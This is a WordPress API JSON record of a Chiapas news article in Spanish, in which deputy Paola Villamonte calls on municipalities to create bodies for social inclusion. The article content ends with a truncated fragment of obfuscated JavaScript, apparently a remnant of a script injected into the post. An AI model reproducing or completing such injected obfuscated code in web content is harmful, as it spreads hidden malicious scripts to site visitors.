{"id":1487,"date":"2022-04-21T03:28:43","date_gmt":"2022-04-21T03:28:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1487"},"modified":"2022-04-21T03:28:44","modified_gmt":"2022-04-21T03:28:44","slug":"politicas-de-inclusion-necesarias-para-garantizar-respeto-e-igualdad-paola-villamonte","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1487","title":{"rendered":"Pol\u00edticas de inclusi\u00f3n, necesarias para garantizar respeto e igualdad: Paola Villamonte"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-20-at-3.20.21-PM-1.jpeg\" alt=\"\" class=\"wp-image-1488\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-20-at-3.20.21-PM-1.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-20-at-3.20.21-PM-1-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-20-at-3.20.21-PM-1-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-20-at-3.20.21-PM-1-310x205.jpeg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas a 20 de abril de 2022.- Es necesario que todas las entidades promuevan e impulsen dentro de sus Planes de Gobierno, pol\u00edticas p\u00fablicas que garanticen inclusi\u00f3n y respeto pleno a los derechos, sostuvo la diputada Paola Villamonte P\u00e9rez presidenta de la Comisi\u00f3n de Atenci\u00f3n a Grupos Vulnerables en el Congreso del Estado.<\/p>\n\n\n\n<p>Lo anterior, durante su participaci\u00f3n en la tribuna de la sala de sesiones, donde exhort\u00f3&nbsp;a los ayuntamientos de Chiapas a crear en su estructura org\u00e1nica un organismo p\u00fablico u \u00f3rgano administrativo, para atender la inclusi\u00f3n social en sus municipios.<\/p>\n\n\n\n<p>Derivado de lo anterior, destac\u00f3 que lo que se busca es que los ayuntamientos, a trav\u00e9s de los organismos p\u00fablicos y \u00f3rganos administrativos, a trav\u00e9s de sus pol\u00edticas p\u00fablicas, planes, programas, estrategias y dem\u00e1s acciones, garanticen el cumplimiento de los objetivos, para mantener una vida productiva, de forma igualitaria, libre de discriminaci\u00f3n, logrando la inclusi\u00f3n social, con total atenci\u00f3n y participaci\u00f3n de las personas en estado de vulnerabilidad.<\/p>\n\n\n\n<p>Con dicha propuesta, -que ya fue aprobada y dictaminada por la Comisi\u00f3n de Atenci\u00f3n a Grupos Vulnerables &#8211; las diputadas y diputados coincidimos en la importancia de impulsarla, adaptando la teor\u00eda administrativa y los lineamientos generales que regulan los movimientos de Estructuras Org\u00e1nicas y plantilla de plazas de la Administraci\u00f3n P\u00fablica Estatal, atentos a evitar la duplicidad de funciones y lograr un trabajo m\u00e1s efectivo, eficiente y transversal, sin que se d\u00e9 un impacto negativo presupuestal.<\/p>\n\n\n\n<p>Lo anterior, subray\u00f3 Paola Villamonte, para estar en concordancia con las pol\u00edticas de austeridad y racionalidad del gasto p\u00fablico que encabezan el presidente de la Rep\u00fablica, Andr\u00e9s Manuel L\u00f3pez Obrador y el gobernador del estado, Rutilio Escand\u00f3n Cadenas, respetando siempre la divisi\u00f3n de poderes.<\/p>\n\n\n\n<p>La presidenta de la Comisi\u00f3n de Atenci\u00f3n a Grupos Vulnerables refrend\u00f3 el compromiso de la Sexag\u00e9sima Octava Legislatura de sumar esfuerzos, para que, en unidad con los 3 \u00f3rdenes de gobierno, la sociedad civil, acad\u00e9micos, asociaciones y sobre todo con los ayuntamientos, establecer directrices que fortalezcan la Inclusi\u00f3n Social, en todos los sectores y niveles.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, Chiapas a 20 de abril de 2022.- Es necesario que todas las entidades promuevan e impulsen dentro de sus Planes de Gobierno, pol\u00edticas p\u00fablicas que garanticen inclusi\u00f3n y respeto pleno a los derechos, sostuvo la diputada Paola Villamonte P\u00e9rez presidenta de la Comisi\u00f3n de Atenci\u00f3n a Grupos Vulnerables en el Congreso del Estado. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1488,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-1487","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1487","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1487"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1487\/revisions"}],"predecessor-version":[{"id":1489,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1487\/revisions\/1489"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1488"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1487"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1487"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1487"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}